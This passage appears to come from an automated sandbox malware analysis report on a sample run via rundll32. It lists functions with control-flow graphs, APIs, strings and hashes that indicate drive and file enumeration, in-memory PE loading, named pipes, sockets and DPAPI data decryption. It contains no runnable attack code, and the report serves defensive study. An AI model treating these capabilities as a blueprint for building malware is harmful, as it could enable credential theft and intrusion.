				return _t4;
			}









                                      0x7ffc288e164e
                                      0x7ffc288e1653
                                      0x7ffc288e165a
                                      0x7ffc288e166c

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320973747.00007FFC288E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007FFC288E0000, based on PE: true
                                      • Associated: 00000001.00000002.320973747.00007FFC28901000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7ffc288e0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Local$AllocFreelstrlen
                                      • String ID:
                                      • API String ID: 3631127845-2735817509
                                      • Opcode ID: e5d980beb2aba3fd4e105c1f750e3b3dd6f0c06f630552ffada5d6f1831a641d
                                      • Instruction ID: da1f6db67d9b6d51b780721fe2d063eec5d3ab3e43f695de02ce65fe1819b8eb
                                      • Opcode Fuzzy Hash: e5d980beb2aba3fd4e105c1f750e3b3dd6f0c06f630552ffada5d6f1831a641d
                                      • Instruction Fuzzy Hash: B9717D2AA186BB41EB6A9B159C107792691FF48BC2F484136ED5D5B7D0EF3CE404C334
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C18718 Relevance: 11.0, APIs: 2, Strings: 4, Instructions: 492COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 123 7df4b3c18718-7df4b3c18758 call 7df4b3c17b7c 126 7df4b3c18c1c-7df4b3c18c49 call 7df4b3c17cc4 call 7df4b3c3f670 123->126 127 7df4b3c1875e-7df4b3c18765 123->127 129 7df4b3c1876b-7df4b3c18797 127->129 133 7df4b3c18ba4-7df4b3c18be7 call 7df4b3c1828c 129->133 134 7df4b3c1879d-7df4b3c187b4 129->134 148 7df4b3c18bec 133->148 139 7df4b3c187ba-7df4b3c187d3 134->139 140 7df4b3c18b31-7df4b3c18b4a 134->140 145 7df4b3c187de-7df4b3c187e2 139->145 146 7df4b3c18c09-7df4b3c18c16 140->146 147 7df4b3c18b50-7df4b3c18ba2 call 7df4b3c1828c 140->147 149 7df4b3c187e4-7df4b3c187e5 145->149 150 7df4b3c187d5-7df4b3c187d8 145->150 146->126 146->129 147->148 151 7df4b3c18bee-7df4b3c18bef 148->151 152 7df4b3c18bf1-7df4b3c18c04 call 7df4b3c18564 148->152 153 7df4b3c187e7 149->153 150->153 154 7df4b3c187da-7df4b3c187db 150->154 151->152 152->146 153->146 159 7df4b3c187ed-7df4b3c18838 153->159 154->145 159->146 164 7df4b3c1883e-7df4b3c1885c 159->164 166 7df4b3c18882-7df4b3c18885 164->166 167 7df4b3c18887-7df4b3c188a4 call 7df4b3c3f690 GetLogicalDrives 166->167 168 7df4b3c1885e-7df4b3c18865 166->168 177 7df4b3c188a6-7df4b3c188a9 167->177 178 7df4b3c18901-7df4b3c18904 167->178 169 7df4b3c18867-7df4b3c1886a 168->169 170 7df4b3c1887b-7df4b3c1887c 168->170 172 7df4b3c18876-7df4b3c18879 169->172 173 7df4b3c1886c-7df4b3c1886f 169->173 174 7df4b3c1887e-7df4b3c1887f 170->174 172->174 173->174 176 7df4b3c18871-7df4b3c18874 173->176 174->166 176->174 180 7df4b3c188f4-7df4b3c188ff 177->180 181 7df4b3c188ab-7df4b3c188bc GetDriveTypeW 177->181 179 7df4b3c1890b-7df4b3c1890e 178->179 184 7df4b3c18954-7df4b3c1895d 179->184 185 7df4b3c18910-7df4b3c18930 179->185 180->177 180->178 182 7df4b3c188da-7df4b3c188e0 181->182 183 7df4b3c188be-7df4b3c188c1 181->183 189 7df4b3c188e2 182->189 187 7df4b3c188d1-7df4b3c188d8 183->187 188 7df4b3c188c3-7df4b3c188c6 183->188 184->179 186 7df4b3c1895f-7df4b3c1896f 184->186 185->184 196 7df4b3c18932-7df4b3c1894f call 7df4b3c1828c 185->196 190 7df4b3c18975-7df4b3c1898f call 7df4b3c3f69c 186->190 191 7df4b3c18b23-7df4b3c18b2c 186->191 187->189 188->180 192 7df4b3c188c8-7df4b3c188cf 188->192 189->180 193 7df4b3c188e4-7df4b3c188ed 189->193 200 7df4b3c189aa-7df4b3c189b5 190->200 191->146 192->189 193->180 196->184 201 7df4b3c189b7-7df4b3c189c9 200->201 202 7df4b3c18991-7df4b3c189a6 200->202 205 7df4b3c18b16-7df4b3c18b1d 201->205 206 7df4b3c189cf-7df4b3c18a19 call 7df4b3c3f5d2 201->206 202->200 205->191 209 7df4b3c18a88-7df4b3c18afb 206->209 210 7df4b3c18a1b-7df4b3c18a1f 206->210 216 7df4b3c18afd-7df4b3c18b0c call 7df4b3c43468 209->216 217 7df4b3c18b11-7df4b3c18b12 209->217 211 7df4b3c18a21-7df4b3c18a81 210->211 220 7df4b3c18a83-7df4b3c18a84 211->220 216->217 217->205 220->209
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: DriveDrivesLogicalType
                                      • String ID: :$A$\$\
                                      • API String ID: 4038169723-2970747007
                                      • Opcode ID: b0a694621581a0022aa59e7e97eb46f4cad8955d03962f010717c508dea69b99
                                      • Instruction ID: 4610c7715fd2df0908afa792ee6f6f0950582351bb02a53f2dd2338b155145f0
                                      • Opcode Fuzzy Hash: b0a694621581a0022aa59e7e97eb46f4cad8955d03962f010717c508dea69b99
                                      • Instruction Fuzzy Hash: D6F1803251CE488BEB68EF98D899AEA77F0FB54300F40052AD54FC3152DA78F995C786
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C22FA4 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122nativememoryfileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: File$AllocCloseInformationOpenSectionUnmapViewVirtual
                                      • String ID: MZ
                                      • API String ID: 528985955-2410715997
                                      • Opcode ID: 253709c67f866cad63d2114e2eba81f682406bc4814dbad8a8ae5e500d44b8a8
                                      • Instruction ID: 263f5de13260d22c2c1932c9c6d4ff35b698a44a00df64130b46265479edbaba
                                      • Opcode Fuzzy Hash: 253709c67f866cad63d2114e2eba81f682406bc4814dbad8a8ae5e500d44b8a8
                                      • Instruction Fuzzy Hash: CE31A721B18A494BFF54E7ED5C68B3A7AF5EB99341F50003AE44BC31D2DA2CD8814351
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C136A0 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 570threadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 251 7df4b3c136a0-7df4b3c136fe call 7df4b3c421bc * 2 call 7df4b3c42d8c 258 7df4b3c13cb4-7df4b3c13cd7 call 7df4b3c3f670 251->258 259 7df4b3c13704-7df4b3c13722 call 7df4b3c02bfc 251->259 265 7df4b3c13724-7df4b3c1372c 259->265 266 7df4b3c1372e-7df4b3c13753 call 7df4b3c230dc 259->266 267 7df4b3c13757-7df4b3c1375b 265->267 266->267 270 7df4b3c13cae 267->270 271 7df4b3c13761-7df4b3c137ad call 7df4b3c3f690 267->271 270->258 271->270 275 7df4b3c137b3-7df4b3c137e7 271->275 279 7df4b3c13ca5-7df4b3c13ca6 275->279 280 7df4b3c137ed-7df4b3c1384b call 7df4b3c1d3dc call 7df4b3c02918 275->280 279->270 285 7df4b3c13a45-7df4b3c13a50 call 7df4b3c01a58 280->285 286 7df4b3c13851-7df4b3c138bb 280->286 294 7df4b3c13a56-7df4b3c13a76 285->294 295 7df4b3c13c8c-7df4b3c13c99 call 7df4b3c1d3f4 285->295 287 7df4b3c13919 286->287 288 7df4b3c138bd-7df4b3c138df 286->288 292 7df4b3c1391b-7df4b3c1392e call 7df4b3c02c8c 287->292 290 7df4b3c138e1-7df4b3c138f4 call 7df4b3c02c8c 288->290 300 7df4b3c138f6-7df4b3c138fe 290->300 301 7df4b3c1390b-7df4b3c13917 290->301 304 7df4b3c13945-7df4b3c13954 292->304 305 7df4b3c13930-7df4b3c13938 292->305 313 7df4b3c13a87-7df4b3c13a8b 294->313 314 7df4b3c13a78-7df4b3c13a7f 294->314 295->279 300->301 307 7df4b3c13900-7df4b3c13906 call 7df4b3c120c0 300->307 301->287 301->290 304->292 306 7df4b3c13956-7df4b3c13957 304->306 305->304 308 7df4b3c1393a-7df4b3c13940 call 7df4b3c120c0 305->308 309 7df4b3c1395a-7df4b3c13994 call 7df4b3c02c8c 306->309 307->301 308->304 323 7df4b3c1399a-7df4b3c139a2 309->323 324 7df4b3c13a22-7df4b3c13a3b call 7df4b3c121a4 call 7df4b3c02be8 309->324 315 7df4b3c13a97-7df4b3c13aa2 313->315 316 7df4b3c13a8d 313->316 314->313 321 7df4b3c13aa8-7df4b3c13ad9 call 7df4b3c3f69c call 7df4b3c225c8 315->321 322 7df4b3c13c23-7df4b3c13c2a 315->322 316->315 321->322 342 7df4b3c13adf-7df4b3c13c0c call 7df4b3c44320 call 7df4b3c43c88 call 7df4b3c193f8 call 7df4b3c123e4 call 7df4b3c433bc call 7df4b3c1ba7c CreateThread FindCloseChangeNotification call 7df4b3c43f9c 321->342 329 7df4b3c13c4e-7df4b3c13c55 322->329 327 7df4b3c13a14-7df4b3c13a1c 323->327 328 7df4b3c139a4-7df4b3c139b9 323->328 338 7df4b3c13a40-7df4b3c13a41 324->338 327->309 327->324 328->327 340 7df4b3c139bb-7df4b3c13a12 call 7df4b3c3f5d2 328->340 330 7df4b3c13c57-7df4b3c13c5d 329->330 331 7df4b3c13c2c-7df4b3c13c48 ??3@YAXPEAX@Z 329->331 341 7df4b3c13c81-7df4b3c13c85 330->341 331->329 338->285 340->327 343 7df4b3c13c87 call 7df4b3c01aac 341->343 344 7df4b3c13c5f-7df4b3c13c78 341->344 363 7df4b3c13c11-7df4b3c13c17 call 7df4b3c1bac8 342->363 343->295 344->341 363->322
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: ??3@ChangeCloseCreateFindNotificationThread_calloc_dbg
                                      • String ID: d
                                      • API String ID: 166476311-2564639436
                                      • Opcode ID: f8442b9e398ab651c0b0ad759ddfe03e1ed3a010777be940d021345a2825fb8b
                                      • Instruction ID: 109d71e2cf4e812fc56031e028747859391f3ee076759d40e9204710effad460
                                      • Opcode Fuzzy Hash: f8442b9e398ab651c0b0ad759ddfe03e1ed3a010777be940d021345a2825fb8b
                                      • Instruction Fuzzy Hash: 4F125F71518E488FEB95EFA9D4596AA7BF0FB54300F10462ED44FC3252DF34E9858B82
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C1782C Relevance: 4.6, APIs: 3, Instructions: 135fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: Find$File$CloseFirstNext
                                      • String ID:
                                      • API String ID: 3541575487-0
                                      • Opcode ID: 5473507164dcd3926eec300200079bceabdad213ffc4607040328178f24ee394
                                      • Instruction ID: 0158b668433341a30e39d6e83543494d79c247e7a03aa69677b9368b434fa0c8
                                      • Opcode Fuzzy Hash: 5473507164dcd3926eec300200079bceabdad213ffc4607040328178f24ee394
                                      • Instruction Fuzzy Hash: 7B417332708E484FEB90EBA9D8596AA77F1FB95301F50453AE14BC3291DE38D9448782
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C1B92C Relevance: 4.6, APIs: 3, Instructions: 110pipeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: NamedPipe$BindCallbackCompletionConnectCreate
                                      • String ID:
                                      • API String ID: 2502124517-0
                                      • Opcode ID: 86698cdaea6b070168e9757c8e61cb38fc1f5760e73426677b828c464fbefd93
                                      • Instruction ID: 147d2610a1cba233ba3e65f1d9faacdd8e411f57b0d689ac3b17fd16d416a294
                                      • Opcode Fuzzy Hash: 86698cdaea6b070168e9757c8e61cb38fc1f5760e73426677b828c464fbefd93
                                      • Instruction Fuzzy Hash: AD315F31618A488FE794DF68D8987AB7BF0FB95310F50462AD05BC21E1DF38D985CB82
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C22E88 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 92filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: FileOpen
                                      • String ID: 0
                                      • API String ID: 2669468079-4108050209
                                      • Opcode ID: 2e6f29b8a254670fdcb33b5353e1a5392e46972b227b1767ba81a870637305b8
                                      • Instruction ID: c559bba7c9a6e534580d816e4f38499270ad0250481869e88a7c5902b9d6a623
                                      • Opcode Fuzzy Hash: 2e6f29b8a254670fdcb33b5353e1a5392e46972b227b1767ba81a870637305b8
                                      • Instruction Fuzzy Hash: 56311071618A888FD794DF99C8D866BB7F0FB99300F50492EE09EC32A1D7789584CB42
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C1828C Relevance: 3.2, APIs: 2, Instructions: 241fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: FileFind$FirstNext
                                      • String ID:
                                      • API String ID: 1690352074-0
                                      • Opcode ID: cc4e1f58a741e0a847789479910143e1a41a58a390ab4c56df2ab5461faa735f
                                      • Instruction ID: 5785296d3f820378b089df87fee7d1c292307eee870a8e9116920aced8f60de7
                                      • Opcode Fuzzy Hash: cc4e1f58a741e0a847789479910143e1a41a58a390ab4c56df2ab5461faa735f
                                      • Instruction Fuzzy Hash: 37818E3160CE488FEB94EF58D898AA677F1FB94301F14463AD44EC7196DB38E984CB81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C448E4 Relevance: 3.1, APIs: 2, Instructions: 93networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • socket.WS2_32(?,?,?,?,?,?,?,?,00000063,00000062,-00000002,00007DF4B3C44A05), ref: 00007DF4B3C44911
                                        • Part of subcall function 00007DF4B3C444F4: ioctlsocket.WS2_32 ref: 00007DF4B3C44520
                                      • bind.WS2_32(?,?,?,?,?,?,?,?,00000063,00000062,-00000002,00007DF4B3C44A05), ref: 00007DF4B3C44996
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: bindioctlsocketsocket
                                      • String ID:
                                      • API String ID: 3555158474-0
                                      • Opcode ID: 75cc138a21902604a50bf09fc40c7ad2cb5a7822a798501e5f08a21d0d77f662
                                      • Instruction ID: ef548f18dfe2f12f6f0bee3fa34f66612aa40b76349117bcbd1d1dc55a711425
                                      • Opcode Fuzzy Hash: 75cc138a21902604a50bf09fc40c7ad2cb5a7822a798501e5f08a21d0d77f662
                                      • Instruction Fuzzy Hash: E621D53170C5044FE7489BAD98AD27636F6FF54325F20067AD86FC22DADB28DC424741
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C115E4 Relevance: 2.3, APIs: 1, Instructions: 815threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: CreateThread
                                      • String ID:
                                      • API String ID: 2422867632-0
                                      • Opcode ID: e204f23e07e5fe114be256f26043225e89d310e5d3f21a5691eae402d807ca03
                                      • Instruction ID: 80c430bfcc10bfaa756edc2facfa84e51767bfecd57dec04d341cd19930773c3
                                      • Opcode Fuzzy Hash: e204f23e07e5fe114be256f26043225e89d310e5d3f21a5691eae402d807ca03
                                      • Instruction Fuzzy Hash: A742713151CB888FD764EF99D4996AA77F1FB94300F10452ED58FC3252DA38E991CB82
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C1C06C Relevance: 1.6, APIs: 1, Instructions: 114encryptionCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: CryptDataUnprotect
                                      • String ID:
                                      • API String ID: 834300711-0
                                      • Opcode ID: 065909b5226e5ffbc6317179f027ca50902e3b2efe95567b1e5a46f5e667f156
                                      • Instruction ID: 64eccb080f87f9cb17e157555edab2f479e821780fd5e3913674c0b97f49a684
                                      • Opcode Fuzzy Hash: 065909b5226e5ffbc6317179f027ca50902e3b2efe95567b1e5a46f5e667f156
                                      • Instruction Fuzzy Hash: E931843175CE484FE748EBA9D85966ABBF1FB8A301F50452DF14BC3292DE39D8418742
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C22834 Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: InformationQuerySystem
                                      • String ID:
                                      • API String ID: 3562636166-0
                                      • Opcode ID: d58f8b538f263f367ae549b4eb4f40a92b68296be0ce84c3cb29e4ca6c126a6e
                                      • Instruction ID: b8da089bd9af446c3f7d47d3e8a0989081bbe4fb250b87dc21e310fc1c18980c
                                      • Opcode Fuzzy Hash: d58f8b538f263f367ae549b4eb4f40a92b68296be0ce84c3cb29e4ca6c126a6e
                                      • Instruction Fuzzy Hash: D5C08C03E18C8A4BED80A7EF4D966293AB0AB89300FC00011A80AC2190E64CE4C08392
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0000025AA36030D0 Relevance: 23.1, APIs: 4, Strings: 9, Instructions: 355memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320511595.0000025AA3600000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025AA3600000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_25aa3600000_rundll32.jbxd
                                      Similarity
                                      • API ID: AllocateHeap$BoundaryDeleteDescriptor
                                      • String ID: $!$!Rcx$!Rex$A$D$E$H$S
                                      • API String ID: 2279964584-3349172591
                                      • Opcode ID: 65066c02667e23bd76fdc9d3f10aea0dbf6c071d317dcde6615cabaccb18c29d
                                      • Instruction ID: 9e61ceb3f4dda1d1958087fd8706eb622122d0c02fa96346728690af9063371e
                                      • Opcode Fuzzy Hash: 65066c02667e23bd76fdc9d3f10aea0dbf6c071d317dcde6615cabaccb18c29d
                                      • Instruction Fuzzy Hash: 03B1543161CB484FD799EE18D88AA9BB3F1FBD9301F504A1EE48AC7142DA70E945C787
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C244A4 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143filememoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: File$??3@AllocChangeCloseCreateFindNotificationReadVirtual_malloc_dbg
                                      • String ID: MZ
                                      • API String ID: 3363203691-2410715997
                                      • Opcode ID: 5e4af987994b7acbedf1a617c617516e2b7c83a12c39e074aeeec05ef4365be6
                                      • Instruction ID: 71100e7e16d1dc0db06dd62ebf02d87e808858277ee22f3aa142a4e32a96efc2
                                      • Opcode Fuzzy Hash: 5e4af987994b7acbedf1a617c617516e2b7c83a12c39e074aeeec05ef4365be6
                                      • Instruction Fuzzy Hash: 03419531A4CA088FDB54EBA8D8991BA77F1FB58301F00453AE48FC3181DF78E9918782
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C248C8 Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 426COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 366 7df4b3c248c8-7df4b3c24902 368 7df4b3c24904-7df4b3c2492b 366->368 369 7df4b3c2492d-7df4b3c24936 366->369 368->369 371 7df4b3c2493a-7df4b3c2494c call 7df4b3c244a4 368->371 369->371 375 7df4b3c24c76-7df4b3c24c89 371->375 376 7df4b3c24952-7df4b3c24986 call 7df4b3c24034 371->376 379 7df4b3c24c8b-7df4b3c24c99 375->379 380 7df4b3c24cb2-7df4b3c24cc5 375->380 389 7df4b3c24c1a-7df4b3c24c33 VirtualFree 376->389 390 7df4b3c2498c-7df4b3c249af call 7df4b3c2441c 376->390 379->380 388 7df4b3c24c9b-7df4b3c24caf 379->388 385 7df4b3c24cc7-7df4b3c24cd5 380->385 386 7df4b3c24cee-7df4b3c24d01 380->386 385->386 395 7df4b3c24cd7-7df4b3c24ceb 385->395 388->380 389->375 391 7df4b3c24c35-7df4b3c24c45 389->391 398 7df4b3c249b5-7df4b3c249c7 390->398 399 7df4b3c24afa-7df4b3c24b00 390->399 391->375 394 7df4b3c24c47-7df4b3c24c50 391->394 397 7df4b3c24c71-7df4b3c24c74 394->397 395->386 397->375 400 7df4b3c24c52-7df4b3c24c54 397->400 398->399 402 7df4b3c249cd-7df4b3c249d0 398->402 399->389 401 7df4b3c24b06-7df4b3c24b09 399->401 403 7df4b3c24c56-7df4b3c24c5e call 7df4b3c246b4 400->403 404 7df4b3c24c63-7df4b3c24c6e 400->404 401->389 405 7df4b3c24b0f-7df4b3c24b1a 401->405 406 7df4b3c249d7-7df4b3c249da 402->406 407 7df4b3c249d2-7df4b3c249d5 402->407 403->404 404->397 405->389 409 7df4b3c24b20-7df4b3c24b34 405->409 411 7df4b3c24a37-7df4b3c24a82 call 7df4b3c2441c 406->411 412 7df4b3c249dc-7df4b3c249df 406->412 407->406 410 7df4b3c249e1-7df4b3c249f1 call 7df4b3c003d8 407->410 409->389 415 7df4b3c24b3a-7df4b3c24b51 call 7df4b3c24608 409->415 419 7df4b3c24a1a-7df4b3c24a30 410->419 420 7df4b3c249f3-7df4b3c249f6 410->420 428 7df4b3c24a94-7df4b3c24a97 411->428 429 7df4b3c24a84-7df4b3c24a92 call 7df4b3c3f5d2 411->429 412->410 412->411 425 7df4b3c24b57-7df4b3c24b6d 415->425 426 7df4b3c24c09-7df4b3c24c14 415->426 419->402 423 7df4b3c24a32 419->423 420->419 422 7df4b3c249f8-7df4b3c24a04 420->422 422->399 427 7df4b3c24a0a-7df4b3c24a14 422->427 423->399 425->426 433 7df4b3c24b73-7df4b3c24b81 425->433 426->389 426->415 427->399 427->419 428->399 430 7df4b3c24a99-7df4b3c24ac2 428->430 429->399 430->399 436 7df4b3c24ac4-7df4b3c24af4 call 7df4b3c3f5d2 430->436 433->426 439 7df4b3c24b87-7df4b3c24b97 call 7df4b3c3f696 433->439 436->399 439->426 443 7df4b3c24b99-7df4b3c24bd0 call 7df4b3c23fd0 439->443 443->426 446 7df4b3c24bd2-7df4b3c24c04 call 7df4b3c3f5d2 call 7df4b3c23fd0 443->446 446->426
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: FreeVirtual
                                      • String ID: MZ$MZ$MZ
                                      • API String ID: 1263568516-970779948
                                      • Opcode ID: 872aeec84cbaeb3725683b3f97cc31e77a18b92113d903afa561b5ea92fb0226
                                      • Instruction ID: 4b86850cc4e494263979e949f9b434579947d2adcff14636be7afc1ae031c2d1
                                      • Opcode Fuzzy Hash: 872aeec84cbaeb3725683b3f97cc31e77a18b92113d903afa561b5ea92fb0226
                                      • Instruction Fuzzy Hash: BFD1A731A5CA488BEF64EFAD9C596BA77F1FB95300F00452AD44FC3196DE78E8818781
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C027E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: ??3@_malloc_dbg
                                      • String ID: !Rcx
                                      • API String ID: 149304988-1190931699
                                      • Opcode ID: 375216cf1db1b95d5aee2b7e97bdc21f36d06a79622ee621d3fb19e0d25edae2
                                      • Instruction ID: 33fdf938c68321ae0806030aa3d30bfefa4bc9678eacdbfb2513af53f64b5572
                                      • Opcode Fuzzy Hash: 375216cf1db1b95d5aee2b7e97bdc21f36d06a79622ee621d3fb19e0d25edae2
                                      • Instruction Fuzzy Hash: 4C31B232608A884FDB64EFA9C8D86AAB7F0FB94315F10463FD48EC2191DA34D545CB82
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C123E4 Relevance: 4.6, APIs: 3, Instructions: 127registryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: InformationOpenQueryValueVolume
                                      • String ID:
                                      • API String ID: 3064582257-0
                                      • Opcode ID: 53bae16748ecdc21ae953881b952189692968bc814a88933c73c387c58fe5f91
                                      • Instruction ID: da07405975dd2662ea1e9ca25b4bf3d21644ff5e116954e40e233e9f511fa18d
                                      • Opcode Fuzzy Hash: 53bae16748ecdc21ae953881b952189692968bc814a88933c73c387c58fe5f91
                                      • Instruction Fuzzy Hash: 68412D7111CB888BE765EF54C898BEBB7F0FB94304F404A2EE18BC2191DF7895448B42
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007DF4B3C444F4 Relevance: 4.6, APIs: 3, Instructions: 117COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.320807383.00007DF4B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF4B3C00000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7df4b3c00000_rundll32.jbxd
                                      Similarity
                                      • API ID: Completion$CreateFileModesNotificationPortioctlsocket
                                      • String ID:
                                      • API String ID: 1455841399-0
                                      • Opcode ID: 2ffc94b0a21e48c42bcc45a374f0656ae988c6d857e7144060324a3055d7017d
